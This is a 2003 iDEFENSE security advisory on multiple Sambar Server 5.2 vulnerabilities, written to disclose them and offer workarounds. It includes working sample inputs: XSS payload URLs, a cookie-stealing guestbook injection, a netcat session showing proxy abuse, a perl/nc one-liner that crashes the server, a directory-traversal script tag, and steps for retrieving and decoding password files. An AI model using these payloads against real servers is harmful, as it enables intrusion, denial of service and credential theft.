Public Vulnerability Reports

Sambar Server Multiple Vulnerabilities

09.25.03

BACKGROUND

Sambar Technologies Sambar Server is multi-threaded application server
available on both Windows and Linux platforms. More information is
available at http://www.sambar.com/.

DESCRIPTION

Multiple vulnerabilities have been discovered in Sambar Technologies
Sambar Server the most severe of which allows remote attackers to
execute arbitrary code under the privileges of the web server as well as
utilize affected servers as an open proxy

**** ISSUE I - Information Disclosure ****

The following default installed scripts can be accessed to glean
information about the Sambar server:

    /cgi-bin/environ.pl
    /cgi-bin/testcgi.exe

**** ISSUE II - Cross-Site Scripting (XSS) ****

The following default installed scripts are vulnerable to cross-site
scripting (XSS) attacks:

    /isapi/testisa.dll?<script>alert(document.URL)</script>
    /cgi-bin/testcgi.exe?<script>alert(document.URL)</script>
    /cgi-bin/environ.pl?<script>alert(document.URL)</script>
    /samples/search.dll?query=<script>alert(document.URL)</script>&logic=AND
    /cgi-bin/mortgage.pl?price="><script>alert(document.URL)</script>
    /samples/ssienv.shtml?<script>alert(document.URL)</script>

The following script also contains a XSS vulnerability albeit only
exploitable from localhost:

    /cgi-bin/dumpenv.pl?<script>alert(document.URL)</script>

The guestbook script (/cgi-bin/book.pl) E-Mail field contains a XSS
scripting vulnerability. The following is an example of exploit input:

    " ONMOUSEOVER="alert(document.cookie)"

**** ISSUE III - Script Execution Through Special Device Request  ****

Sambar server fails to check if Windows special device names such as
con, aux and com1 are requested. This allows an attacker with physical
access to a Sambar server to execute arbitrary code under the privileges
of the web server by generating a request such as:

    POST /cgi-bin/com1.pl HTTP/1.0

The above request will instantiate the Perl interpreter (perl.exe) to
process code from the COM1 port. An attacker can supply code to the
interpreter by connecting to the target system through a null-modem
cable with a terminal application.

**** ISSUE IV - Unrestricted Proxy Access ****

Sambar server by default allows proxy access to localhost. A bug in the
processing of HTTP/1.1 requests allows an attacker to bypass this
restriction thereby opening up the proxy server to any remote address.
The following example demonstrates how this vulnerability is exploited:

    $ nc 10.0.0.22 80
    GET / HTTP/1.1

    HTTP/1.1 200 OK
    Date: Tue, 10 Feb 2003 17:06:23 GMT
    Server: SAMBAR 5.2
    MIME-version: 1.0
    Transfer-Encoding: chunked
    Keep-Alive: max=30, timeout=5
    Connection: Keep-Alive
    Content-type: text/html

    [ output trimmed for sake of brevity ]

    GET http://www.example.com HTTP/1.1
    Host: example.com

    HTTP/1.1 200 OK
    Date: Tue, 10 Feb 2003 17:26:10 GMT
    Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
    Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT
    ETag: "3f80f-1b6-3e1cb03b"
    Accept-Ranges: bytes
    Content-Length: 438
    Connection: close
    Content-Type: text/html

    <HTML>
    <HEAD>
    <TITLE>Example Web Page</TITLE>
    </HEAD>
    <body>
    <p>You have reached this web page by typing "example.com",
    "example.net", or "example.org" into your web browser.</p>
    [ output trimmed for sake of brevity ]
    </BODY>
    </HTML>

**** ISSUE V - Mail Relaying ****

A default installation of Sambar server includes a sample mail relaying
script, mailit.pl. The script is intended for demo purposes and as such
restricts access to localhost only. However, an attacker can utilize the
above-described (IV) proxy vulnerability to generate the following
request:

    POST http://127.0.0.1/cgi-bin/mailit.pl HTTP/1.0

Which will cause mailit.pl to be executed with a $REMOTE_ADDR of
127.0.0.1, thereby bypassing the localhost only restriction.

**** ISSUE VI - Arbitrary File Access ****

Building upon the proxy (IV) and mail relaying (V) vulnerabilities it is
possible for an attacker to relay mail with an attached file. While the
script takes measures to guard against directory traversal attacks in
file inclusion it does not address them all. The following methods can
be used to include an arbitrary system file for attachment:

    - There are no checks for : or \ allowing an attacker to specify
      an absolute path for file inclusion.
    - There are no checks for % allowing an attacker to pass a file name
      through the %QUERY_STRING% variable.
    - The mailit.pl script invoked mailit.exe through the usage of the
      system() call. Because the character is not filtered it can be
      used to in essence comment out a " character and add arguments to
      the system() call.

Any system file can be retrieved using this method, including the server
configuration and password files. Retrieved password files can be
decoded with a utility available on the following website:

    http://www.security.nnov.ru/advisories/sambarpass.asp

**** ISSUE VII - Arbitrary File Upload ****

Sambar server allows administrators to upload files to the server's docs
directory via the HTTP PUT directive. This action is restricted to
localhost users but can be bypassed by remote attackers through the
exploitation of the proxy vulnerability (IV).

**** ISSUE VIII - Denial of Service ****

Sambar server crashes when the following request is made from localhost
(a trailing space at the end of ther request is required):

    GET http://127.0.0.1/

This vulnerability can be remotely exploited in combination with the
proxy vulnerability (IV). The following is an example attack that will
crash the affected Sambar server running at 10.0.0.22 with the proxy
service enabled (default) and restricted to localhost only (also
default):

    $ perl -e 'print "GET / HTTP/1.1rnrnGET http://127.0.0.1/
      rnrn"' | nc 10.0.0.22 80

**** ISSUE IX - Arbitrary Code Execution ****

Sambar server supports server side scripting languages through STM
files. The following example tag would execute environ.pl with arguments
'foo' set to '111' and 'bar' set to '222'.

    <RCCenviron.pl foo=111 bar=222>

STM files allow for directory traversal modifiers in the specification
of script names. The following tag for example would load the same
script if it were to be moved to ../docs/samples:

    <RCC../docs/samples/environ.pl foo=111 bar=222>

Successful exploitation of this vulnerability in combination with the
proxy (IV) and arbitrary file upload (VII) vulnerabilities allows an
attacker to remotely execute arbitrary commands on an affected system
thereby resulting in a system compromise under the privileges of the web
server.

ANALYSIS

Any remote attacker with access to an affected Sambar server can exploit
the above-described vulnerabilities. Successful exploitation could lead
to system compromise in a default install of Sambar server. An attacker
can exploit the remote proxy vulnerability to attack a third party on
behalf of the affected Sambar server.

According to the Netcraft Web Server Survey there are currently
approximately 6,400 Sambar driven web servers on the net.

DETECTION

iDEFENSE has confirmed the existence of these vulnerabilities in Sambar
version 5.2. It is reported and suspected that older versions are
affected as well.

WORKAROUND

Administrators should remove all default-installed scripts. This will
resolve the XSS and information disclosure vulnerabilities as well as
preventing remote attackers from exploiting the mailit.pl script to
relay mail, access files, and upload files.

Administrators that do not require the proxy service can disable it
thereby preventing all remote exploitation that depends on the proxy
vulnerability (IV). If the proxy service is required an ingress
application level filter can be used to deny HTTP/1.1 requests as the
vulnerability does not affect requests for HTTP/1.0.

VENDOR RESPONSE

Multiple Vulnerabilities from idefense.com
(http://www.sambar.com/security.htm)

CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

CREDIT

3APA3A (3apa3a@security.nnov.ru) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

LEGAL NOTICES

Copyright © 2004 Verisign, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.